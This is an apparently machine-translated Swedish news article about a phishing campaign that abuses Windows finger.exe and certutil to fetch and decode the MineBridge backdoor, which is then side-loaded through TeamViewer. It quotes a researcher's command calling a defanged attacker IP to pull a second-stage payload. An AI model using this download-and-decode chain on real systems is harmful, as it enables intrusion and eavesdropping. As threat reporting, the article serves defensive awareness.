En ny nätfiskekampanj upptäcktes i det vilda som missbrukade en legitim Windows-funktion för att ladda ner bakdörr skadlig programvara. Hotaktörer här använder spridande e-postmeddelanden med skadliga körbara filer, som om de laddas ner och aktiveras, kommer att använda Windows Finger-kommandot för att hämta MineBridge malware.
Windows-funktion missbrukas för att ställa in bakdörr
Det är vanligt att hackare missbrukar legitima systemfunktioner för att undvika upptäckt. Hot skådespelare av MineBridge skadlig programvara också gör detsamma, i en nyligen upptäckt nätfiskekampanj. Kirk Sayre, en säkerhetsforskare har upptäckt den här kampanjen, där skurkarna utnyttjar Windows Finger-funktion.
Finger-funktionen är ett fjärrverktyg för att få information om listan över användare på ett fjärrsystem eller djupgående detaljer om en specifik användare som använder ett fjärrsystem. Detta var först tillgängligt för Linux/Unix OS och senare för Windows. Som beskrivs av Kirk Sayre, hackare använder detta kommando för att installera MineBridge-bakdörrar i värdens system.
https://t.co/U0GtPdILCk ITW maldoc använder finger.exe för att ladda ner 2nd stage. Kör ‘finger nc20@184[.]164[.]146[.]102’ för att dra ner b64-kodat cert, certutil för att avkoda, kör nyttolast. Nyttolast är https://t.co/LeJ8mIYyIh.
— Kirk Sayre (@bigmacjpg) 14 januari 2021
MineBridge var rapporterades först av FireEye-säkerhetsteametdär författarna till den spred Word-filer med skadliga körbara filer genom nätfiske-e-postmeddelanden, utsatta som sökande CV för ett jobb, och kommer att be om att aktivera redigeringsalternativen för att se dem. Nu händer de på samma sätt, med samma ämne.
Intet ont anande användare som faller för det här tricket öppnar först Word-dokumentet, aktiverar redigeringsalternativ som tillfrågats och visar en falsk ansökan om jobbet. I bakgrunden ord körbar laddar ner ett lösenordsskyddat makro för vidare operationer.
Bleeping Computer kunde kringgå lösenordsautentiseringen och deobfuscerade makrot för att se ett Base64-kodat certifikat som laddas ner från en fjärrserver med kommandot Windows Finger, och sparas som %AppData%\vUCooUr. Detta certifikat avkodades sedan med kommandot certutil.exe och sparades som %AppData%\vUCooUr.exe.
Om du kör det installeras en TeamViewer körbar för att sidladda MineBridge skadlig programvara med DLL-kapningsmetoden. Detta kommer att ge hotaktörerna ett privilegium att lyssna på infekterade värdar via deras systems mikrofon och planera sina nästa drag. Därför föreslås det att du inaktiverar fingerfunktionen för gott om den inte används.